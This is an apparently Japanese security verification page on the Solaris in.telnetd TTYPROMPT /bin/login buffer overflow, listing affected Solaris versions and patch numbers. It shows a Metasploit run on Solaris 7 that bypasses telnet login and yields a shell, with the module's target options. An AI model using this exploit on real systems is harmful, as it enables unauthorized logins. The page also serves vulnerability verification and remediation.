目次
Solaris in.telnetd TTYPROMPT Buffer Overflow Exploit
更新履歴
- 2006/03/19 初版
- Author kikuzou
概要
- System V 由来の /bin/login コマンドにバッファオーバーフローの問題
- 本手順では Solaris について検証
- telnetdのユーザ認証を回避して、システムにログインが可能
- 2002/01/18 公開
影響を受けるシステム
- SPARC Platform
- Sun Solaris 8.0
- Sun Solaris 7.0
- Sun Solaris 2.8
- Sun Solaris 2.6
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun Solaris 2.2
- Sun Solaris 2.1
- Sun Solaris 2.0
- x86 Platform
- Sun Solaris 8.0
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4
参考URL
Exploitの検証
検証環境
- Solaris 7 (SPARC)
検証結果
- システムにログイン可能
[*] Setting TTYPROMPT ... [*] Setting user 'bin' with 65 chars ... [*] Wait for shell ... [*] FindConnection found a shell... ABCDEFG $ uname -a uname -a SunOS hoge 5.7 Generic_106541-14 sun4us sparc FJSV,GPUS $
- Metasploit を使用して検証を実施
- オプションは以下のとおり
msf solaris_ttyprompt(cmd_interact) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ -------------- ------------------ required RHOST 192.168.1.10 The target address required RPORT 23 The target port required USER bin Default username Payload: Name Default Description -------- ------ ------- ----------- Target: No Target Needed msf solaris_ttyprompt(cmd_interact) >
対処方法
- パッチの適用
- SPARC Platform
- Sun Solaris 8.0 - Sun 110668-03
- Sun Solaris 7.0 - Sun 107475-04
- Sun Solaris 2.6 - Sun 106049-04
- Sun Solaris 2.5.1 - Sun 103640-40
- x86 Platform
- Sun Solaris 8.0 - Sun 110669-03
- Sun Solaris 7.0 - Sun 107476-04
- Sun Solaris 2.6 - Sun 106050-04
- Sun Solaris 2.5.1 - Sun 103641-40
- telnetdの停止 (sshを使用する)
